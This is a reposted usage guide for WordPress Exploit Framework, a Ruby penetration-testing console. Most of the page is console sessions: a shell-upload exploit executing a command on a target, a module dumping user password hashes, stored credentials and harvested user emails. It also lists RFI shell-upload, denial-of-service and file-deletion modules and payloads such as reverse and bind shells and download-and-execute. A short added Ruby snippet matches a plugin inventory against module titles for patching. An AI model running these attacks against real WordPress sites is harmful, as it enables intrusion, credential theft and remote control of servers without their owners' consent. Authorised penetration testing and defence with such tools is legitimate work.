WordPress Exploit Framework - A Ruby Tool For WordPress Penetration Testing
WordPress Exploit Framework is an open source framework that is designed to aid in the penetration testing of WordPress systems.
Requirements:
- Ruby >= 2.4.4
How To Install WordPress Exploit Framework
To install the latest stable build, run gem install wpxf.
After installation, you can launch the WordPress Exploit Framework console by running wpxf.
Debian Systems:
If you have issues installing WPXF's dependencies (in particular, Nokogiri), first make sure you have all the tooling necessary to compile C extensions:
sudo apt-get install build-essential patch
It's possible that you don't have important development header files installed on your system. If that is the case, install them:
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev
Windows Systems:
If you are experiencing errors that indicate that libcurl.dll could not be loaded, you will need to ensure the latest libcurl binary is included in your Ruby bin folder, or any other folder that is in your environment's PATH variable.
The latest version can be downloaded from curl.haxx.se/download.html. As of 16/05/2016, the latest release is marked as Win32 2000/XP zip 7.40.0 libcurl SSL. After downloading the archive, extract the contents of the bin directory into your Ruby bin directory (if prompted, don't overwrite any existing DLLs).
How To Use WordPress Exploit Framework
Start the WordPress Exploit Framework console by running wpxf. Once loaded, you'll be presented with the wpxf prompt. From here you can search for modules using the search command or load a module using the use command.
Loading a module into your environment will allow you to set options with the set command and view information about the module using info.
Below is an example of how one would load the symposium_shell_upload exploit module, set the module and payload options and run the exploit against the target.
wpxf > use exploit/shell/symposium_shell_upload
[+] Loaded module: #<Wpxf::Exploit::SymposiumShellUpload:0x3916f20>
wpxf [exploit/shell/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/shell/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/shell/symposium_shell_upload] > set payload exec
[+] Loaded payload: #<Wpxf::Payloads::Exec:0x434d078>
wpxf [exploit/shell/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/shell/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
Supported Commands:
- back
Changes the context of the session back to before loading the current module.
wpxf [exploit/shell/admin_shell_upload] > back
wpxf >
- check
Check if the currently loaded module can be used against the specified target.
wpxf [exploit/shell/admin_shell_upload] > check
[!] Target appears to be vulnerable
wpxf [exploit/shell/admin_shell_upload] >
- clear
Clear the screen.
- creds
List the credentials stored in the current workspace.
wpxf > creds
ID Host            Username Password Type
-- --------------- -------- -------- -----
13 wordpress.vm:80 root     toor     plain
14 wordpress.vm:80 test              plain
wpxf >
- creds -d [id]
Delete the credential with the matching [id] number.
wpxf > creds -d 8
[+] Deleted credential 8
wpxf >
- gset
Set an option value globally, so that the current module and all modules loaded afterwards will use the specified value for the specified option.
wpxf > gset host wordpress.vm
[+] Globally set the value of host to wordpress.vm
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3578af0>
wpxf [exploit/shell/admin_shell_upload] > show options
Module options:
Name                Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host                wordpress.vm    true     Address of the target host.
http_client_timeout 5               true     Max wait time in seconds for HTTP responses
password                            true     The WordPress password to authenticate with
port                80              true     Port the remote host is listening on
proxy                               false    Proxy address ([protocol://]host:port)
ssl                 false           true     Use SSL/HTTPS for all requests
target_uri          /               true     Base path to the WordPress application
username                            true     The WordPress username to authenticate with
verbose             false           true     Enable verbose output
vhost                               false    HTTP server virtual host
wpxf [exploit/shell/admin_shell_upload] >
- gunset
Unset a global option set with the gset command.
wpxf > gunset host
[+] Removed the global setting for host
wpxf >
- info
wpxf [exploit/shell/admin_shell_upload] > info
Name: Admin Shell Upload
Module: exploit/shell/admin_shell_upload
Disclosed: 2015-02-21
Provided by:
rastating
Module options:
Name       Current Setting Required Description
---------- --------------- -------- -------------------------------------------
host       wordpress.vm    true     Address of the target host.
password   toor            true     The WordPress password to authenticate with
port       80              true     Port the remote host is listening on
proxy                      false    Proxy address ([protocol://]host:port)
ssl        false           true     Use SSL/HTTPS for all requests
target_uri /               true     Base path to the WordPress application
username   root            true     The WordPress username to authenticate with
verbose    false           true     Enable verbose output
vhost                      false    HTTP server virtual host
Description:
This module will generate a plugin, pack the payload into it and upload it to
a server running WordPress; providing valid admin credentials are used.
wpxf [exploit/shell/admin_shell_upload] >
- loot
List the loot collected from targets in the current workspace.
wpxf > loot
ID Host            Filename                Notes                                 Type
-- --------------- ----------------------- ------------------------------------- ---------
1  wordpress.vm:80 2018-07-14_15-00-56.csv Registered users and e-mail addresses user list
All filenames are relative to /home/rastating/.wpxf/loot
wpxf >
- loot -d [id]
Delete the loot item with the matching [id] number.
wpxf > loot -d 1
[+] Deleted item 1
wpxf >
- loot -p [id]
wpxf > loot -p 2
Email,Name
"lPBrOHC@mBeTjaAGGh.com","atgvrf"
"gSLzaYG@uZVUAeSJvj.com","dowzvc"
"AMfWgAH@uDNuULjBQv.com","efhkjv"
"halFIgH@CYqrzDzwQU.com","omquqt"
"root@wordpress.vm","root"
wpxf >
- quit
Exit the WordPress Exploit Framework prompt.
- rebuild_cache
Re-build the module cache.
wpxf > rebuild_cache
[!] Refreshing the module cache...
wpxf >
- run
Run the currently loaded module.
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] > run
[-] Determining database prefix...
[-] Dumping user hashes...
Username Hash
-------- -----------------------------------
root     $P$BqL7kZ\/A30CnAbIriSrXRmKvY9ynx80
ATgVrF   $P$Bc5VwreNVctuXYwqKuN0IOWiDib79g.
DOWzVC   $P$BwtOdeIGMW.jR7\/zfzMp.kc4FJcPwB.
OmQUqt   $P$BOUcq9FWVxEyyrqyZNApW79kgPm7wq\/
eFhkJv   $P$B1h9aF1cYdIBnAoh9F6NkchHXlTMpe.
[+] Execution finished successfully
wpxf [auxiliary/hash_dump/simple_ads_manager_hash_dump] >
- set
Set an option value for the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > set host wordpress.vm
[+] Set host => wordpress.vm
wpxf [exploit/shell/admin_shell_upload] >
- setg
Alias for gset.
- search
Search for modules that contain one or more of the specified keywords.
wpxf > search rfi
[+] 3 Results for "rfi"
Module                                             Title
-------------------------------------------------- ----------------------------------------
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload Flickr Picture Backup RFI Shell Upload
exploit/rfi/wp_mobile_detector_rfi_shell_upload    WP Mobile Detector RFI Shell Upload
wpxf >
- show advanced
Show the advanced options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show advanced
Name: basic_auth_creds
Current setting:
Required: false
Description: HTTP basic auth credentials (username:password)
Name: follow_http_redirection
Current setting: true
Required: true
Description: Automatically follow HTTP redirections
Name: max_http_concurrency
Current setting: 20
Required: true
Description: Max number of HTTP requests that can be made in parallel (Min: 1, Max: 200)
Name: proxy_auth_creds
Current setting:
Required: false
Description: Proxy server credentials (username:password)
Name: user_agent
Current setting: Mozilla/5.0 (Macintosh; U; U; Intel Mac OS X 10_7_6 rv:6.0; en-US) AppleWebKit/533.49.6 (KHTML, like Gecko) Version/4.0.2 Safari/533.49.6
Required: false
Description: The user agent string to send with all requests
Name: verify_host
Current setting: true
Required: true
Description: Enable host verification when using HTTPS
Name: wp_content_dir
Current setting: wp-content
Required: true
Description: The name of the wp-content directory.
wpxf [exploit/shell/admin_shell_upload] >
- show auxiliary
Show the list of available auxiliary modules.
wpxf > show auxiliary
[+] 58 Auxiliaries
Module                                 Title
-------------------------------------- -----------------------------------------------------------
auxiliary/dos/load_scripts_dos         WordPress "load-scripts.php" DoS
auxiliary/dos/long_password_dos        Long Password DoS
auxiliary/dos/post_grid_file_deletion  Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion
auxiliary/dos/wp_v4.7.2_csrf_dos       WordPress 4.2-4.7.2 - CSRF DoS
...
wpxf >
- show exploits
Show the list of available exploits.
wpxf > show exploits
[+] 289 Exploits
Module                                                   Title
-------------------------------------------------------- --------------------------------------------
exploit/rfi/advanced_custom_fields_remote_file_inclusion Advanced Custom Fields Remote File Inclusion
exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload       Fast Image Adder <= 1.1 RFI Shell Upload
exploit/rfi/flickr_picture_backup_rfi_shell_upload       Flickr Picture Backup RFI Shell Upload
exploit/rfi/gwolle_guestbook_remote_file_inclusion       Gwolle Guestbook Remote File Inclusion
exploit/rfi/wp_mobile_detector_rfi_shell_upload          WP Mobile Detector RFI Shell Upload
...
wpxf >
- show options
Show the basic options of the currently loaded module.
wpxf [exploit/shell/admin_shell_upload] > show options
Module options:
Name                Current Setting Required Description
------------------- --------------- -------- -------------------------------------------
host                wordpress.vm    true     Address of the target host.
http_client_timeout 5               true     Max wait time in seconds for HTTP responses
password                            true     The WordPress password to authenticate with
port                80              true     Port the remote host is listening on
proxy                               false    Proxy address ([protocol://]host:port)
ssl                 false           true     Use SSL/HTTPS for all requests
target_uri          /               true     Base path to the WordPress application
username                            true     The WordPress username to authenticate with
verbose             false           true     Enable verbose output
vhost                               false    HTTP server virtual host
wpxf [exploit/shell/admin_shell_upload] >
- unset
Unset an option set with the set command.
wpxf [exploit/shell/admin_shell_upload] > unset host
[+] Unset host
wpxf [exploit/shell/admin_shell_upload] >
- unsetg
Alias for gunset.
- use
Load the specified module into the current context.
wpxf > use exploit/shell/admin_shell_upload
[+] Loaded module: #<Wpxf::Exploit::AdminShellUpload:0x3af1100>
wpxf [exploit/shell/admin_shell_upload] >
- workspace
wpxf > workspace
[-] default (active)
[-] test
wpxf >
- workspace [name]
Switch to the [name] workspace.
wpxf > workspace test
[+] Switched to workspace: test
wpxf >
- workspace -a [name]
Add a new workspace.
wpxf > workspace -a wiki
[+] Added workspace: wiki
wpxf >
- workspace -d [name]
Delete the [name] workspace.
wpxf > workspace -d wiki
[+] Deleted workspace: wiki
wpxf >
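For defenders, the module titles printed by search, show auxiliary and show exploits above double as a list of plugins (and, where the title carries one, the affected version bound) to check an estate against. The Ruby code below is an added example, not part of WPXF or of the original page; the inventory is constructed sample data, and the helper names classify and triage and the status labels are assumptions made for illustration.

```ruby
require 'rubygems' # Gem::Version, used for dotted-version comparison

# Module path => title, copied from the console output on this page.
MODULE_TITLES = {
  'exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload' =>
    'Fast Image Adder <= 1.1 RFI Shell Upload',
  'exploit/rfi/wp_mobile_detector_rfi_shell_upload' =>
    'WP Mobile Detector RFI Shell Upload',
  'auxiliary/dos/post_grid_file_deletion' =>
    'Post Grid <= 2.0.12 Unauthenticated Arbitrary File Deletion'
}.freeze

# Constructed sample inventory: plugin display name => installed version.
INVENTORY = {
  'Fast Image Adder'   => '1.2',
  'Post Grid'          => '2.0.12',
  'WP Mobile Detector' => '3.5',
  'Akismet'            => '4.0.8'
}.freeze

# Returns :in_range, :above_bound or :no_bound_in_title for one plugin/title
# pair, or nil when the title does not start with the plugin name.
def classify(plugin, installed, title)
  return nil unless title.downcase.start_with?("#{plugin.downcase} ")

  rest = title[plugin.length..-1].strip
  bound = rest[/\A<=\s*(\d+(?:\.\d+)*)/, 1]
  return :no_bound_in_title if bound.nil? # title gives no version: review by hand

  Gem::Version.new(installed) <= Gem::Version.new(bound) ? :in_range : :above_bound
end

# One finding per (plugin, module) pair whose title names the plugin.
def triage(inventory, titles)
  inventory.flat_map do |plugin, installed|
    titles.map do |path, title|
      status = classify(plugin, installed, title)
      status && { plugin: plugin, installed: installed, module: path, status: status }
    end.compact
  end
end

if __FILE__ == $PROGRAM_NAME
  triage(INVENTORY, MODULE_TITLES).each do |f|
    puts format('%-18s %-7s %-17s %s', f[:plugin], f[:installed], f[:status], f[:module])
  end
end
```

Matching is by plugin-name prefix, so treat the output as a review list for patching rather than a verdict; titles without a "<=" bound are reported as no_bound_in_title and need a manual version check.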
Difference Between Auxiliary and Exploit Modules
Auxiliary modules do not allow you to run payloads on the target machine, but instead allow you to extract information from the target, escalate privileges or provide denial of service functionality.
Exploit modules require you to specify a payload which subsequently gets executed on the target machine, allowing you to run arbitrary code to extract information from the machine, establish a remote shell or anything else that you want to do within the context of the web server.
Available Payloads
- bind_php: uploads a script that will bind to a specific port and allow WPXF to establish a remote shell.
- custom: uploads and executes a custom PHP script.
- download_exec: downloads and runs a remote executable file.
- meterpreter_bind_tcp: a Meterpreter bind TCP payload generated using msfvenom.
- meterpreter_reverse_tcp: a Meterpreter reverse TCP payload generated using msfvenom.
- exec: runs a shell command on the remote server and returns the output to the WPXF session.
- reverse_tcp: uploads a script that will establish a reverse TCP shell.
Source: www.effecthacking.com